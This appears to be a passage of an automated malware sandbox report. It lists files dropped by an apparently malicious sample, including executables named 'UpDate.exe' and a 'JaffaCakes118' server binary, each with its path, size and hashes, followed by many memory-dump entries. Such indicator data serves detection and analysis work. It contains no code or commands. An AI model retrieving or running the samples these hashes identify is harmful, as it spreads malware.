SHA1
f954ea045bff00ee390b9f73b6b37006f593bc7f

SHA256
c99090a6d6cd9cb315491de75a544ff4471327862f37845536e64c7725645320

SHA512
d4089882958264bd6bdf0814539a9caf4fcd1524e9dedc701b6ad7c7aa0c4027bde645d3ec9144de1ce6481418004030dc8dc464f63fc929b8843a4339e35767

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
45d5b8493f38305f466557b26775c396

SHA1
647402007a7d4ce72bda41fdf4195bdc8d87203b

SHA256
2bec4ebd709b58422dfa58c095b1e223aed6d041538eb7250ca3091acc92a92f

SHA512
84b9cffca08100bab18430d82639184bc0fb40e298bec5950b355826d7d76170845c864c02cd77325e266714f663a13147c804068ceec0d7590e8ff7c8b31b8a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8cb9e96dc27a49f1895197c3577639b8

SHA1
b82e7fb5af65ab5f8436ca2e5ae84e1cbff14670

SHA256
4c5add0100f0d38a4c7ab16f50ae6ea459ff4226e1438f42f79643df28019ed3

SHA512
6de4b59927c5d27da4a2e53b01f40d76a7772d7348170eeae7bbc3f38e39008a5bdbe5e42a424dbedc7ac03bd1016be1919d126e518a5e8b93c3408291cb8f51

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
952639bbea3cf19cc80cd216f540f767

SHA1
c1625c7e798b1c1e7cb626b9badad9f3c8442108

SHA256
cb31497bdc81180a50228a0dbfe1473494912c2c72088b6886854f933252c460

SHA512
3beaf0cc8eb6de10f170807f361954fac81189a13cb68d9eee351ec19baf14a6fd423ae0df2104807babb85b56c65d276b248f4c0d60716436b8358a97ed5bdf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
44d6ed411bab7e102f7e555c5ed417a0

SHA1
f35082a37274bda4eeb7d40aa910f2d3c21f33b7

SHA256
b14852bd599c810af02d8fd03599d1db9762b54dd1da34d312b4ce8cfef27aa7

SHA512
5d29af754f1083e94a452e7219bc8ff1df26acf961d99dbd6d30fb022313a90d9666c998bc006138f5db8255113106f1f6991ddd80bf84d782d763fae52736b1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
451f4fd31bd8a87ed9998932a3799387

SHA1
3a2e485e5b2336c203af9d3d8eb454e8cd59b63a

SHA256
72600b59b70f3836d5a7966a21a1723ccf14dbd54a89e14dab4d63eab94ef7ec

SHA512
a4491ee4c0f6ff8eb907aa31f8aad10bb0d69f1f39e85288c28d0176467e7fb03844b743607ba59914aa6fdc32d5129c309df2a7cb961a2a5e1113a71ac66bad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9c41bef4e20916d407d592604b464621

SHA1
8fcd02945cb648a2fdd6d9d73325602cb996013f

SHA256
55ab84434de1b4c3d1ab50f56413c7e6ed79a5ec300a36c1400776283c970367

SHA512
840e60b065ecbc82448e6725daf6951e888faebaffa5e6541f87cba9c923b21e9f009b1f07ea5e7783e2022b3dd7fceae3900d7a184b8e9703635b6276185559

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7c81b87f04ec46a2a8372b492f29d173

SHA1
96e8c610033dec0155438910c83147b29003a0c0

SHA256
22c288155f00f324694f9a9d9156d7fc62810ae344d06dbcb6d94c93e9c8095d

SHA512
b161b3ce3e11c00aeb8dc276bc7d386f6ba3d9b1c3d5ac6922efffe194fc814e1bc534fb1da1c1c4414d498e1f9c7e9373ccd97afe02fb748f645458579b0bdb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
47b5b92038d536658c517edc3ae7c449

SHA1
928abeaf9e0aea139bb04c7cf41f6b82b99f1286

SHA256
c43a56f3e17ceb0cb7f68be99ba7f2c0d68029045624fa03b8ee49fafffbcda4

SHA512
f39120223b06818de3d776008e4b666214d62a3d5845843a653d89411c9d94d6c7eb67f81d7c22a970c44f95630498d5b162b291cb2d1d081395a729056122f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
263d4632fc06c135554d2087109a037f

SHA1
b6d156ec92bc8d67e5fc06c0de37a8d12a650413

SHA256
e3c4d16172de392851ddfd4be623f4c9975460b173a4546b946c3d3a018a1e63

SHA512
388707157ffff6ecd63e43a54fe05fd1ced5513a7be2a825a355a7231e5f0d7f77601a1775957b49ef8cb5f20374d0477dbab29ee76910285cd22c4368822676

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9a3ee2b7b9ade54f896fb2873565d284

SHA1
41bb7e2139cf0a96cd9f149258758bf1a8721632

SHA256
341cf025ce623ce558b1137752c65f477a6540f8c8dd119fa905c5cdb70d68fc

SHA512
ec7645e43dd9dc8aa60870d0e2b1b3d74aceac204b608180635dd394aa7a2b72341e83a62655f3ff6cc6c88eb9f2da2e7fa0b7612a2bd2db60b12168c53ced35

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8aaee7f53bc5bf7e5ff93449f1f51a31

SHA1
e3598be46b6cfdb79249b5cc456ecc17a42760c7

SHA256
9ec77b86d89b217a6b2eae3c1efa84b7fd1d96aab924c8e70611f7ee7cd771bc

SHA512
be2c977e90248454fdaf5827495483717ae7a6f990538063bbf73aaa0c0b5f180f32b898e92d9ae0f7d3816b8e558ed839f87fa8d7d8e547612a35cddcd05abd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
17a1da90ba4a8859e888afafbeffa1e3

SHA1
22396d3136661e63d9d13e3dabe014a06362b5ac

SHA256
06e1a566669033aafb8a80cfd2ca5db44a36f08c9daf6a9a62cad27d549eff99

SHA512
654eca435fb38360d6102749a289a2c0e40acb61a53fbd3c2e6e15c43ac56f41a3746d18ca33a27a10735f9f33a2141fe99180d1c693fc4830f300dfa22296f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
49ee3f20731afbf650bb004cf42c94d2

SHA1
e80657b92bfb13237ea9aaba909de795a0611767

SHA256
c560d29d5b7ed5c8a696e2bdc95f88e0b2ecc79c30e79a6467a0e1e81cfd3a8f

SHA512
b9a8a4fae9a3ca0c4dc7344a0ac04a41b83fc89f877bbf94f673d5633a139788d7ae114a778ac11d99936269577cca504182040384ee1d6eb3765fa5e7e9502b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d91c4c349d3d18e635b2af9276c47a40

SHA1
ae78c92e04d79af9f0b265d7d343aa407aeed958

SHA256
d7ddd046edf6098187f5ba67d45820d3bab47a14bf8e2cb3632639ffcf2fd786

SHA512
8e6fcded42edc022cafde989f3b433d73d6a2c79753182d63122a182f376d27ccfc1ca89cc1d5fc1f29b5de8416fe0a9f6d8154d38d597308a881e1a0e9ec0d6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
970e24fd8d828716ed374020e3354dc7

SHA1
f5b9ffcecff04a7ae36093870e4c5920b40f52a3

SHA256
041000a0819d3dde8238663f06a1c83d9dd16fdc3bd7a11929fa92b08e6e0585

SHA512
2409cc814517ec61cd169c7156813981d4db5964f7e424cdb50e55952d147aad1e062ab2fbac49cae96febc02f76d219372af8d566b22bf2834b2c83343c28dd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ca7d8dbd258a8db8283522c1967fee02

SHA1
2e67fe38c5c2e301327bdb5e44058b95a4b132f2

SHA256
14543f8e146290d41e13a0d0206714963b4f6b1f79b9b6b7d8242e979b3c250c

SHA512
95cb6446f40cb693351291174bf630a5d24b1f349859ce4ebda3fcdb2d117a604594d6090c78bf376aba6b865c72b27f3ce61811a34cae4d8e86ad820278f485

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5be5e6197143792a61e53a77c636291d

SHA1
b1f8290be484f2bc858b92a451ebea9fa56ce177

SHA256
97d9735c5ebcbdfb51e13427e6c2b233ce6a1b2ae36dc3ec344e019fcf594e0b

SHA512
09fb7cf3fb81417422f0afa8d689b0fa057c8f892d92ab22785349fb550028d6219c14db57bff7dc76abc2eca09752b3f159686e237c5a9cf01367cee184eb26

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ac2cbc9305bd97da384eb68e0b6e8ad0

SHA1
bd23be79779142b5ac36e081b21162cd76bdcdf9

SHA256
80b7616439e951979d9b43dd59a6c3fbe9b8117e61f642c2598d69e7ea1d63bf

SHA512
cba3735e087844c78cd2c6d24926572c81c427c3aa31bb033ec8b1f77ea859b221f925cef0c6170e48112be4d0e506fce06b9fd1727c679d7ce3939b7455b679

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e719d79214d1d0199a71eca0b24b4ade

SHA1
0ec01813bdee35e8920378d50f7e428a0779a17f

SHA256
a0efa0bc85fba1822d43382ef8894a0fb4c288f673427361adb64a462eaf33d8

SHA512
24a887082181546b4c2be8decda096d3b8f969034713528bb8dce9cfa9abb25a55281d1e5e4c5368d8d7a72c8a12ec71e3ee181b41fc34689003ccba761097b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fe982fd096e5afa3f02fab4be9e04861

SHA1
95a8f6315ee52a767d3be23a513c82c1e14cf9e1

SHA256
dbb82933920d1ec12ba657b22097c147a2dfb5cd6751125b1abb6c4aea4f3d91

SHA512
128fe37c20938c951fe775a9810ef6d4e99d4f65c66e0a9c6aaf70c2eed9dfce3979bdf81f6be0b493c07a881b164825597073608e93cebd58863c6500fa0d7d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
a997522cd5b83f639f761c708a5077f8

SHA1
c05fe3f7410c17da6eea6bb5414091061de4cf9f

SHA256
29d16d61ba58276228109b1ed40443457863fdb5a02234d8320aad46651840d3

SHA512
4132793f28b4726dfc7b5331292996da1220f0a5dbbc701afecbbf51d527e93d7dd961504dbb00c8ad867d5914d2f86c848a8c3cb3ca5b2747bc0a63f87bb119

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA6AD.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe

Filesize
55KB

MD5
ff5e1f27193ce51eec318714ef038bef

SHA1
b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6

SHA256
fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320

SHA512
c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA71E.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe

Filesize
213KB

MD5
22ec9bd8587c55918707d4af545317e1

SHA1
970c756dd66ea3454718b685dd90afd6f9c06993

SHA256
d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc

SHA512
057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c

Download Submit
\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe

Filesize
660KB

MD5
7f30817677c8eb93ce3e6e3a7fa96d94

SHA1
cd94493fd86daf6cc93dcff7d61c0815244e4dfb

SHA256
38ce5c8329211d986a06cc0c543207f58ce68e76a26a11bd41b7e92022b0d200

SHA512
7e0788f2e24bad4d8040c25039eeace8a98364bc40d651cdec7212e4b6b5699ff9949e5f158696009ccacf0605da4938fa82067cf8634ae1853c6bf4c591b2a8

Download Submit
memory/1104-519-0x0000000002D70000-0x0000000002F2E000-memory.dmp

Filesize
1.7MB

Download
memory/2236-590-0x0000000000B30000-0x0000000000CEE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-618-0x0000000000B30000-0x0000000000CEE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-615-0x0000000000B30000-0x0000000000CEE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-616-0x0000000000340000-0x000000000036E000-memory.dmp

Filesize
184KB

Download
memory/2236-614-0x0000000000B30000-0x0000000000CEE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-613-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-529-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-533-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-534-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-589-0x0000000000B30000-0x0000000000CEE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-591-0x0000000000340000-0x000000000036E000-memory.dmp

Filesize
184KB

Download
memory/2236-592-0x0000000000B30000-0x0000000000CEE000-memory.dmp

Filesize
1.7MB

Download
memory/2236-535-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-537-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-539-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-541-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-543-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-545-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-547-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2236-549-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2264-9-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2496-71-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-65-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-59-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-61-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-66-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-51-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-24-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-44-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-45-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-63-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-40-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-36-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-83-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-77-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-73-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-0-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-34-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-67-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-47-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-55-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-23-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-26-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-70-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-28-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-30-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-32-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-69-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-68-0x0000000000400000-0x00000000005BE000-memory.dmp

Filesize
1.7MB

Download
memory/2496-58-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-49-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-42-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-22-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-6-0x00000000005C0000-0x00000000005EE000-memory.dmp

Filesize
184KB

Download
memory/2496-38-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2496-53-0x0000000010000000-0x000000001003E000-memory.dmp

Filesize
248KB

Download
memory/2960-18-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2960-21-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2960-19-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2960-15-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2960-17-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download